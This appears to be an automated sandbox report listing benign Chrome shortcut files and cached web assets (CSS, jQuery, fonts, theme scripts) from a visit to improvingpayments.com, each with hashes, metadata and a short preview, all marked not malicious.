Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xj.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xp.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xp.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xp............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............j.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 19:27:33 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.005524963229139
Encrypted:	false
SSDEEP:
MD5:	A052ADED9B88FB53428B5CF2A6E09F60
SHA1:	D5829C7453CC70B8296783DB351B0E934557BEB0
SHA-256:	00BC1218B2BC8896268A5C8292E749DBEB1F8D7495F3313C47AD5D35F37B8159
SHA-512:	4EF027578C0DBF5D9B72DFC853D9E32916556EC9096AE9D3498F144E5D7C4392D3B05742B0E21910DE7532F83F91374583629FF80D8A47E18EA505394F6A565E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....J.X.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xj.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xp.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xp.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xp............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xq............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............j.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 19:27:33 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.994412100195721
Encrypted:	false
SSDEEP:
MD5:	D51578EC4F6B53CA6B2FE8DADEF5DED3
SHA1:	DEC4B6A0185FC25D90BBBE2C53902AE8EEABFC61
SHA-256:	4F3FC4254B40579CAD5942FCC139F441B5733C2BA4CFB3084DED25BD40D504F7
SHA-512:	C38F89736498BE2FD633BD17991D3FCCA1501C57A9AC49808CA2064FE9F2F4DC0ED5520D462D643AEA18023A3D7CD9C42F5AC99246635A1065E829D7AF401FA6
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....).d.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xj.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xp.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xp.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xp............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xq............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............j.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 19:27:33 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	4.0066029470502205
Encrypted:	false
SSDEEP:
MD5:	6446025FB7066BA7E73AE3E02BBA5682
SHA1:	9FD42DD4D80B4EF446FCE66570228F8942FD5176
SHA-256:	B57D6C88F8D8A21DE1CCEAB18C7CF7BA034554E38570CED9BE3C4F35F6C09483
SHA-512:	F25EC527DA00CC37D4A3C14705FCF2A2D57B5675D2FF9986747C0B52C3E49AAA5272A3EDDFE7A1A542D9B00BD478C0EF50991867694212E41505E53843CBB7F0
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....jO.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xj.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xp.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xp.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xp............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xq............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............j.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (413), with no line terminators
Category:	downloaded
Size (bytes):	413
Entropy (8bit):	4.388084632528324
Encrypted:	false
SSDEEP:
MD5:	CB17D4E4C3FD00800B0F561B8A057149
SHA1:	638201B94E04BD2082788A774DDE22696AD7402E
SHA-256:	5ECB54F91384AF7226CB4F18F87588EDD49CEFF5BDD4A3010336E1C22CCC390D
SHA-512:	E297C755125BC5F41927C53C22B676ECEBD0A96F41DD1998C85DC90AE1CCE1082EA6CF207146FCBA49CC56A0B86270EBF0DF38CFF31CC68078ED1842A11F7293
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/css/modules/lazyload/frontend.min.css?ver=3.11.1
Preview:	.lazyloaded:not(.elementor-motion-effects-element-type-background),.lazyloaded>.elementor-motion-effects-container>.elementor-motion-effects-layer,.lazyloaded>[class*=-wrap]>.elementor-motion-effects-container>.elementor-motion-effects-layer,body.e-lazyload .e-con.lazyloaded:before,body.e-lazyload .lazyloaded,body.e-lazyload .lazyloaded .elementor-background-overlay{--e-bg-lazyload-loaded:var(--e-bg-lazyload)}

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1099), with no line terminators
Category:	downloaded
Size (bytes):	1099
Entropy (8bit):	4.823534405714972
Encrypted:	false
SSDEEP:
MD5:	B9444342D9DC2815E7207AA9E4FAE19B
SHA1:	623170F05E753A0BE0CCD74F8BD3AD64E8898CD1
SHA-256:	D3DB8504F059A77C6FECB4DBAC858CA00B80B33AE444F8F86BF4FDA5400B5A32
SHA-512:	1FD4329ADC715FD034F295D49710837F5D59B69DAAFA32BA56CE2D96946F862CBEA83A56C8C8E6012A4EB0B5073238A9DC0ED322533D39B181616512F855DD85
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/uploads/elementor/css/post-5.css?ver=1676534195
Preview:	.elementor-kit-5{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Roboto Slab";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Roboto";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Roboto";--e-global-typography-accent-font-weight:500;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:1200px;}.e-con{--container-max-width:1200px;}.elementor-widget:not(:last-child){margin-bottom:20px;}.elementor-element{--widgets-spacing:20px;}{}h1.entry-title{display:var(--page-title-display);}@media(max-width:1024px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:1024px;}.e-con{--container-max-width:1024px;}}@media(max-width:767px){.elementor-section.el

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8189)
Category:	downloaded
Size (bytes):	21438
Entropy (8bit):	5.300921910116817
Encrypted:	false
SSDEEP:
MD5:	C4E68A0F3463C0BD3C39EAB38815E881
SHA1:	0CE58644E9F3C5063A11453FF287C5EC096465A7
SHA-256:	CA7DCE2391845E8AEC7DA135F33FABD10F74EED28A532AC66FD01F761FCFB42F
SHA-512:	E871F258F625A5C8E8EC3848242352FD75DCB0F0B580333FCE07625A6A2F53E83F22E4DD7492F2D12A880709D540DE0BCDD9B335D853FE9CCCFC0EFCCF718BCE
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
Preview:	/! jQuery UI - v1.13.2 - 2022-07-14. http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sorta

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (61132), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	190395
Entropy (8bit):	5.228783949808712
Encrypted:	false
SSDEEP:
MD5:	6164F2C4AC72A2DED2A883F057AB5B12
SHA1:	747E3EA972027A7F4B99D3598D5B08988F512901
SHA-256:	5C10B8231B19222EC7C908BA74A87A57A44A694F7B1471594F03BF937A42F489
SHA-512:	49693BD17549C31F6F5DDAC48989086DE87DED6FA3BDBB8A17D4D1E72FFCD345314EB1CBEDE084D27297F40B7C7A4CA6120E7C877B742EB715FFFF64374CA40E
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/
Preview:	<!DOCTYPE html>..<html lang="en-US">..<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1">..<link rel="profile" href="https://gmpg.org/xfn/11">....<title>Improving Payments – Improving Payments</title>.<link rel="preload" href="https://improvingpayments.com/wp-content/astra-local-fonts/heebo/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EuyysdUmm.woff2" as="font" type="font/woff2" crossorigin><link rel="preload" href="https://improvingpayments.com/wp-content/astra-local-fonts/montserrat/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2" as="font" type="font/woff2" crossorigin><meta name='robots' content='max-image-preview:large' />.<link rel="alternate" type="application/rss+xml" title="Improving Payments » Feed" href="https://improvingpayments.com/feed/" />.<link rel="alternate" type="application/rss+xml" title="Improving Payments » Comments Feed" href="https://improvingpayments.com/comments/feed/" />.<script>.window._wpemojiSettings = {"baseUrl":"https:\

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	776
Entropy (8bit):	4.613066560374153
Encrypted:	false
SSDEEP:
MD5:	A5BF64D5859EE94A3E8E93D592D6D2A0
SHA1:	049EB63B42DBB820B06870A430F523BF06880721
SHA-256:	25825611ADE7CEAED7DF3862EC56DC91AD1D2BE539966EF7BBE84306E51CFB08
SHA-512:	22C9C7AD86AD2B45124C5FF6B0A41E271EE176CFE0249C973877E51A1895F6D25C8F69B1C4EB565F5FE5E2BEFE2F4B80D4A89DCEA57EEAC43B3AE8E020469809
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=1.6.13
Preview:	.footer-width-fixer {. width: 100%;.}../* Container fix for genesis themes /...ehf-template-genesis.ehf-header .site-header .wrap,..ehf-template-genesis.ehf-footer .site-footer .wrap,..ehf-template-generatepress.ehf-header .site-header .inside-header {. width: 100%;. padding: 0;. max-width: 100%;.}../ Container fix for generatepress theme /...ehf-template-generatepress.ehf-header .site-header,..ehf-template-generatepress.ehf-footer .site-footer {. width: 100%;. padding: 0;. max-width: 100%;. background-color: transparent !important; / override generatepress default white color for header /.}...bhf-hidden {. display: none.}../ Fix: Header hidden below the page content */..ehf-header #masthead {..z-index: 99;. position: relative;.}.

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	56
Entropy (8bit):	4.417827466198228
Encrypted:	false
SSDEEP:
MD5:	E4F3F03809A1403455262996EBD49F26
SHA1:	8F31D07941D2B7EE1FDF3656E8B9FBCB5A3712BA
SHA-256:	DF5A2E20E2A65A8D2ACB23A305949315DF437527BAC00AA329BE595C9A2E85A6
SHA-512:	8E10194A457015E74B918CD4950536BEFBA7B6B42EB7C52C755FBEF0D7116DA27711E037093C8E43ECE7181E0F4DFB5D867AD8031B6F6CB42EDC3F1F97A38DDA
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAkf6BYpks2nXxIFDRM0Cs4SHgmGrp7L4T1hMRIFDQFrT-0SBQ27JJMAEgUN17YV3Q==?alt=proto
Preview:	CgkKBw0TNArOGgAKGwoHDQFrT+0aAAoHDbskkwAaAAoHDde2Fd0aAA==

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 12264, version 1.0
Category:	downloaded
Size (bytes):	12264
Entropy (8bit):	7.981408815916569
Encrypted:	false
SSDEEP:
MD5:	D3D668CE420AA39A809332CFA20BEE62
SHA1:	E88C367BE3BD76A0E1CA756B24EF896A5E9B5349
SHA-256:	EDCA86796431C83A5C62288A256A2E33D2A1B5B91511BFD47FA8B13A405BC450
SHA-512:	B1FDF74636111343BCBD9A2C46188D8470B11330749162EEDFD953A86E6C75D71E72D715DF150652A9EBA49261FC886820ECDEBBC844A3B21B37C14714499E54
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/astra-local-fonts/heebo/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EuyysdUmm.woff2
Preview:	wOF2....../.......Y.../.................................T.`?STAT..t......U..`..6.$..<. ..........L.".8..P?......1..l.!:k......O.......q..-<...8.....5s;.h)#$.%.....Y@<&V......B}.jN/..l....j.r.@l0.1..P.Ql....Q.=go3j:1..\.K..+.....%.vf..!.../..l.;..(d.....;.....A........:..."..>7y.X7.}..y.~...s.\|&Av+.g?...$@.....I^..Who......Z....1...ee.".9.!.!....z`0.03.....BTr"6.RAZ.@:PN9....r.....Ei.U.\....!.]...\|.I,.f.#T)R..n;.. .+[.k..a4,.p........T"`.......0...."W! ...x,(y..6....q....T........V[D.A]x..Wd...........(..."..`>.Y<`.5N..4......&.rk . K.......n2>...-.cos...D. .:...=..xR...B....>T0.'..S....q{.I>..e.>.4...........A.!...!U4....4.I3.a.P...P......u.4M.TLQ..W.X.=....(."..8.z..`tGg.G.....~..1..>...^...v.3..Oe....6T...0..SO..gd.$%=.....&...;......@~.\|......^.r9gs".H2....#-...$/.....J..Dx..ox.[:..L,b.T.E3..$...... IiX...B.$>l-H.\|.?...B..l..W.n:.=.].8..B..9,..,p....{.4...)V....3....;A.......)..!=4..;.b$.j9...uM_...G+..'..1...\.i...uJ#(..T.m.qL.[.

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (13479)
Category:	downloaded
Size (bytes):	13577
Entropy (8bit):	5.272065782731947
Encrypted:	false
SSDEEP:
MD5:	9FFEB32E2D9EFBF8F70CAABDED242267
SHA1:	3AD0C10E501AC2A9BFA18F9CD7E700219B378738
SHA-256:	5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
SHA-512:	8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Preview:	/! jQuery Migrate v3.4.1 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)\|\|[],o=r.exec(t)\|\|[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")\|\|n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 33092, version 1.0
Category:	downloaded
Size (bytes):	33092
Entropy (8bit):	7.993894754675653
Encrypted:	true
SSDEEP:
MD5:	057478083C1D55EA0C2182B24F6DD72F
SHA1:	CAF557CD276A76992084EFC4C8857B66791A6B7F
SHA-256:	BB2F90081933C0F2475883CA2C5CFEE94E96D7314A09433FFFC42E37F4CFFD3B
SHA-512:	98FF4416DB333E5A5A8F8F299C393DD1A50F574A2C1C601A0724A8EA7FB652F6EC0BA2267390327185EBEA55F5C5049AB486D88B4C5FC1585A6A975238507A15
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/astra-local-fonts/montserrat/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
Preview:	wOF2.......D......6...............................a......Z?HVAR...`?STAT.8'2..F/~.....\|.M....0....6.$.... ..x..<..[.%Q.i.<.N..t.Yx..5.A...\|..g#l....5.....D.Bt.......l.Y].)..(..H.s..V..ruM....[.....I.0h.v.Hc.R..]....`$.I)G.+.}....E%.H..\|..%nEE.....+.x..7\|........[..V....[.......0...CA.._....)2.$.....s_fw....+.V.H.B.<?.?..mloc..1.Q....a.r#...)......\|.F>..../6-.......t......>......tO.:f@b....u.I(.Bc..b....7.?A.....vE.}...kb]W7.h..$@......T1t.8.._?...~..,..I..."Y...1..s.V........R.Bf2..I....s.........u.P.&..D./"2qf....p.sv..)b5.yR.$MR3.@.E../>{w.....f...cN...2.v.....]>..Ow...9/!v...r..1.4.n.w...T......=...hRH!.....2`...u..82L...S.v.ik^.V.....@..N....d{..{...NN"'.H...H$..H.<..{?..x.....zv.}.~.N)4.g...X.....8\|}...e,%.:..;.Q..88...@..=UVHe....g..zD?..U...~.J...oMoP..6B"Y.{BN...vY<.o..r.7.7j%.Z%.'...]...........YK...,.a-;.M....>\.......%'+8Z.1K.y...9.(;.5 ..M..L.(..9...T)........hx..i2Y...m..{ulY...d......")^.,.n.~..r..S.o.$.....6=.i...N.....q0 ....

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (12198), with no line terminators
Category:	downloaded
Size (bytes):	12198
Entropy (8bit):	5.031745242580206
Encrypted:	false
SSDEEP:
MD5:	3819C3569DA71DAEC283A75483735F7E
SHA1:	ECD40A5CC6F0B76200C454CA880210DC301CFAB8
SHA-256:	214674CC77ABA35AB3567B88E2739FD08E8E96C61D279559AD61874069683EA0
SHA-512:	2710655DFF46653DAEB3A6E3F6D36F885E51D5B375738EE353ACA40C6F66AE1A7DECE57039D58747012ED9EA2822191143C06F270123B8CC580F6A41B8E8AEF4
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
Preview:	!function(){"use strict";function Waypoint(options){if(!options)throw new Error("No options passed to Waypoint constructor");if(!options.element)throw new Error("No element option passed to Waypoint constructor");if(!options.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+keyCounter,this.options=Waypoint.Adapter.extend({},Waypoint.defaults,options),this.element=this.options.element,this.adapter=new Waypoint.Adapter(this.element),this.callback=options.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=Waypoint.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=Waypoint.Context.findOrCreateByElement(this.options.context),Waypoint.offsetAliases[this.options.offset]&&(this.options.offset=Waypoint.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),allWaypoints[this.key]=this,keyCounter+=1}var keyCounter=0,allW

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	50030
Entropy (8bit):	5.488503231408606
Encrypted:	false
SSDEEP:
MD5:	313A6232699B2F02296B5BE9F4A0A5F8
SHA1:	D9AA6F8DE96B123EA9F0546E062E340657EF0191
SHA-256:	94F0CB222975E7939A4B4C283376FC06FBCDFCFCED990A4CFBB37BF74A29567F
SHA-512:	BC2E265DCE9B7980797576354E94F3403FCC09F7090FE3BCC8C1979CC1D4D5A022226B98ABC293C3FD9D45D3E9465779FA43E7C1E68042F8AEBEC14A9CD43C8D
Malicious:	false
Reputation:	unknown
URL:	https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=swap&ver=6.5.2
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOiCnqEu92Fr1Mu51QrEz0dL_nz.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOiCnqEu92Fr1Mu51QrEzQdL_nz.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOiCnqEu92Fr1Mu51QrEzwdL_nz.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. font-display: swap;. src: url(https://font

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (34943), with no line terminators
Category:	downloaded
Size (bytes):	34943
Entropy (8bit):	5.13938609998511
Encrypted:	false
SSDEEP:
MD5:	C5B5A7CC2B37189F6138BCA4A785AEF3
SHA1:	EFCF240338645D53E5545313C127E34E2C9F9FB3
SHA-256:	6729AF5194454B5DAE48057BF13E0C8302108D96071F5B4E74E7FD3F732A8BC5
SHA-512:	21A5C22936DD20E317F4EB9016C67F6295205F2001ECF29224790129DE25C4BD9E26FA1BC3C319B69B37F0A1B0D669B08CDB6A3F8A1F137293AEB7AB9DEF2E77
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/uploads/astra-addon/astra-addon-660af4587c31c5-27379364.js?ver=4.0.1
Preview:	astraToggleSetupPro=function(e,a,t){var l,n,o,r=!1;if(0<(l="off-canvas"===e\|\|"full-width"===e?(n=document.querySelectorAll("#ast-mobile-popup, #ast-mobile-header"),(o=a.classList.contains("ast-header-break-point")?document.querySelectorAll("#ast-mobile-header .main-header-menu-toggle"):document.querySelectorAll("#ast-desktop-header .main-header-menu-toggle")).length):a.classList.contains("ast-header-break-point")?(n=document.querySelectorAll("#ast-mobile-header"),(r=!(0<(l=(o=document.querySelectorAll("#ast-mobile-header .main-header-menu-toggle")).length)))?1:l):(n=document.querySelectorAll("#ast-desktop-header"),(o=document.querySelectorAll("#ast-desktop-header .main-header-menu-toggle")).length))\|\|r)for(var s=0;s<l;s++)if(r\|\|(o[s].setAttribute("data-index",s),t[s]\|\|(t[s]=o[s],o[s].addEventListener("click",astraNavMenuToggle,!1))),void 0!==n[s])for(var d,i=0;i<n.length;i++)if(0<(d=document.querySelector("header.site-header").classList.contains("ast-builder-menu-toggle-link")?n[i].que

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3147), with no line terminators
Category:	downloaded
Size (bytes):	3147
Entropy (8bit):	4.685727105894895
Encrypted:	false
SSDEEP:
MD5:	452D788D5DDDADB1D8BB4194B046BFA8
SHA1:	C532F75226E2E27FD17ECD48411403A17AECF75D
SHA-256:	27D880A933A42A50068D72128560A19FEB2C52DA76B9B5BF2A62DD1EE431B109
SHA-512:	7323FE50929791FD3351EF2927FC8F35A83FA4ACC9E9C762BA3B3C0B038CDF6774361D9355BBE4FD0C52C255F9316204602B0F4542D8297B859CC6147721087B
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/uploads/elementor/css/post-263.css?ver=1676534196
